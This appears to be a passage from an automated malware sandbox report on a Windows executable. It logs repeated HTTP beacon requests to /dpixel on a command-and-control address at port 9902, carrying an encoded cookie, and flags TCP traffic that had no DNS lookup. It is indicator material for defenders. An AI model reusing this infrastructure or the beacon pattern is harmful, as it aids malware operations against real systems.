Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80
Source: unknown	TCP traffic detected without corresponding DNS query: 139.196.73.80

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Code function: 0_2_0000017DEA72E3A0 _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,

0_2_0000017DEA72E3A0

Source: global traffic	HTTP traffic detected: GET /WNwA HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
